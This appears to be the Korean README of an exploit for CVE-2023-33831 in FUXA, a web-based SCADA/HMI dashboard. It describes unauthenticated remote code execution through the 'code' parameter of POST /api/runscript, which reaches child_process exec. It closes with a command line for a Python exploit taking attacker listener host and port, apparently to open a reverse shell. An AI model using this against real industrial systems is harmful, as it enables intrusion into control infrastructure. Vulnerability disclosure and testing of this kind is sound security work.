
FUXA 웹 기반 프로세스 시각화(SCADA/HMI/Dashboard) 소프트웨어에 영향을 미치는 CVE-2023-33831에 대한 설명 및 익스플로잇.
이 취약점은 FUXA의 스크립팅 구성 요소에 영향을 미치며, 사용자가 제어할 수 있는 입력에 대한 제어 또는 삭제(sanitization)가 부족하여 원격 코드 실행으로 확장될 수 있는 위험한 메서드를 사용할 수 있게 됩니다. 영향을 받는 경로는 /api/runscript로, POST 메서드를 통해 code 매개변수로 인증 없이 child_process 모듈의 exec 함수를 사용하여 명령을 실행할 수 있습니다.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>